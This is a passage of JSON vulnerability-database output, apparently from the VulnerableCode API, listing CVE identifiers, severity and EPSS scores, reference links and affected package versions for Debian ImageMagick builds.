"VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-11598" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5a4x-wwha-pufn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81956?format=api", "vulnerability_id": "VCID-6279-tc7g-g3ag", "summary": "ImageMagick: outside the range of representable values of type 'unsigned int' at MagickCore/quantum-private.h", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27768.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27768.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27768", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.19988", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.20136", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.20194", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.19923", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.20002", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.20056", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.20074", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.2003", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.19972", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.19956", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.1996", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.19848", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27768" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27768", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27768" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894689", "reference_id": "1894689", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894689" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27768" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6279-tc7g-g3ag" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82056?format=api", "vulnerability_id": "VCID-68kj-s42g-effd", "summary": "ImageMagick: memory leak in coders/dot.c", "references": [ { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-16710.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-16710.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41284", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41194", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41365", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41409", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41306", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41376", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41405", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41332", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41383", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.4139", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41411", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41379", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1528", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/issues/1528" }, { "reference_url": "https://www.debian.org/security/2020/dsa-4712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1801667", "reference_id": "1801667", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1801667" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-35:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-35:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-35:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*" }, { "reference_url": 